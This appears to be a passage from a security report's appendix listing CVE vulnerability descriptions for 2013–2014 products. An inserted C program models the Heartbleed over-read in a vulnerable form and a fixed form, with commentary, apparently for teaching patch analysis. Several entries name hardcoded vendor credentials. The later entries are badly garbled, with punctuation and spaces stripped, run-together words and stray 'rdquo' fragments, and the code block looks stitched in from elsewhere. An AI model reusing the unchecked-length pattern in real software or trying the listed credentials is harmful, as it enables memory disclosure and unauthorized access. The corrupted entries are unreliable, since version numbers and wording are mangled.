Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492
Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736
Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803
ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826
WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a //www.google.com/ substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3137
Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".

CVE-2013-3194
Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3199
Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3201
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3206
Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.

CVE-2013-3280
EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632
The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.

CVE-2013-3656
Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.

CVE-2013-3856
Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2013-3860
Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".

CVE-2013-3893
Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.

CVE-2013-3897
Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2013-3900
The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".

CVE-2013-3905
Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".

CVE-2013-4223
The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.

CVE-2013-4436
The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.

CVE-2013-4478
Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.

CVE-2013-4529
Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.

CVE-2013-4555
Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.

CVE-2013-4776
NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.

CVE-2013-4782
The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057
hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".

CVE-2013-5369
IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428
IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431
Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494
Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507
The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536
Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559
Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561
The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751
Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757
Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828
Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167
Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188
Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284
Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability".

CVE-2013-6396
The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475
Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660
The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699
The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702
The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979
The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994
OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043
Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389
Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001
Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.
CVE-2014-0035
The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
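The Heartbleed entry above reduces to one missing comparison: the 16-bit payload length inside the heartbeat message was trusted without being checked against the length of the TLS record that carried it. The following C model is an added example and is not code from this report or from OpenSSL. It lays out a constructed "process memory" buffer (g_memory, with the marker string PRIVATEKEY standing in for key material), implements the unchecked copy the way OpenSSL 1.0.1 through 1.0.1f did, and beside it the bounds check introduced in 1.0.1g. The record layout (type, 16-bit length, payload, at least 16 bytes of padding) follows RFC 6520; the function and buffer names are assumptions made for this illustration, and the over-read is deliberately kept inside g_memory so the demonstration itself is well defined.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

#define HB_REQUEST   1
#define HB_RESPONSE  2
#define HB_PADDING  16   /* RFC 6520: a heartbeat carries at least 16 bytes of padding */

/* Constructed "process memory" for the demonstration (not real OpenSSL state):
 * the received record is laid out at the front, and bytes that must never
 * leave the process sit immediately behind it. */
unsigned char g_memory[64];
static const char SECRET[] = "PRIVATEKEY";   /* constructed marker standing in for key material */

/* Lay out a heartbeat request whose length field claims claimed_len payload
 * bytes while the record actually carries actual_len bytes. Returns the true
 * record length (what OpenSSL's rrec.length would hold), or 0 if it does not
 * fit. claimed_len is clamped so the over-read stays inside g_memory. */
size_t build_heartbeat(uint16_t claimed_len, size_t actual_len)
{
    size_t rec_len = 3 + actual_len;
    if (rec_len + sizeof SECRET - 1 > sizeof g_memory) return 0;
    if ((size_t)claimed_len > sizeof g_memory - 3) claimed_len = (uint16_t)(sizeof g_memory - 3);
    memset(g_memory, 0, sizeof g_memory);
    g_memory[0] = HB_REQUEST;
    g_memory[1] = (unsigned char)(claimed_len >> 8);
    g_memory[2] = (unsigned char)(claimed_len & 0xff);
    memset(g_memory + 3, 'A', actual_len);
    memcpy(g_memory + rec_len, SECRET, sizeof SECRET - 1);   /* secret sits just past the record */
    return rec_len;
}

/* Vulnerable handler: mirrors OpenSSL 1.0.1 through 1.0.1f, which copied
 * payload-length bytes out of the record without comparing that length to
 * the record's real length. Returns the response length, -1 if out is too small. */
int heartbeat_vulnerable(const unsigned char *rec, size_t rec_len,
                         unsigned char *out, size_t out_cap)
{
    uint16_t payload = (uint16_t)((rec[1] << 8) | rec[2]);
    size_t resp_len = 3 + (size_t)payload + HB_PADDING;
    (void)rec_len;                           /* never consulted: that is the bug */
    if (resp_len > out_cap) return -1;
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);       /* reads past rec_len when the length field lies */
    memset(out + 3 + payload, 0, HB_PADDING);
    return (int)resp_len;
}

/* Hardened handler: the two checks added in OpenSSL 1.0.1g. A record that
 * cannot hold type + length + payload + padding is silently discarded (0). */
int heartbeat_fixed(const unsigned char *rec, size_t rec_len,
                    unsigned char *out, size_t out_cap)
{
    uint16_t payload;
    size_t resp_len;
    if (1 + 2 + HB_PADDING > rec_len) return 0;                     /* too short for the header */
    payload = (uint16_t)((rec[1] << 8) | rec[2]);
    if (1 + 2 + (size_t)payload + HB_PADDING > rec_len) return 0;   /* claimed length exceeds record */
    resp_len = 3 + (size_t)payload + HB_PADDING;
    if (resp_len > out_cap) return -1;
    out[0] = HB_RESPONSE;
    out[1] = rec[1];
    out[2] = rec[2];
    memcpy(out + 3, rec + 3, payload);       /* now provably within the record */
    memset(out + 3 + payload, 0, HB_PADDING);
    return (int)resp_len;
}

/* Does a response of resp_len bytes carry the secret marker? */
int response_leaks_secret(const unsigned char *out, int resp_len)
{
    int n = (int)(sizeof SECRET - 1), i;
    for (i = 3; i + n <= resp_len; i++)
        if (memcmp(out + i, SECRET, (size_t)n) == 0) return 1;
    return 0;
}

int main(void)
{
    unsigned char out[128];
    size_t rec_len = build_heartbeat(24, 4);   /* claims 24 payload bytes, carries 4 */
    int r = heartbeat_vulnerable(g_memory, rec_len, out, sizeof out);
    printf("vulnerable: %d-byte response, leaks marker: %s\n", r,
           (r > 0 && response_leaks_secret(out, r)) ? "yes" : "no");
    r = heartbeat_fixed(g_memory, rec_len, out, sizeof out);
    printf("fixed: %s\n", r == 0 ? "record discarded" : "answered");
    return 0;
}
```

The point for a patch-management discussion is that the defence is not detectable from the wire: a crafted request and a legitimate one differ only in whether the length field agrees with the record, so nothing short of the 1.0.1g code (or an IDS rule that reimplements the same comparison) stops the leak.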
CVE-2014-0207
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259
Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".

CVE-2014-0266
The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability".

CVE-2014-0294
Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability".

CVE-2014-0313
Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-0321.

CVE-2014-0354
The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362
Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433
Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488
APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493
Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494
Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498
Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515
Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533
Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536
Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562
Cross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.
CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster, Page 23 of 28
CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.
CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.
CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.
CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.
CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.
CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.
CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.
CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."
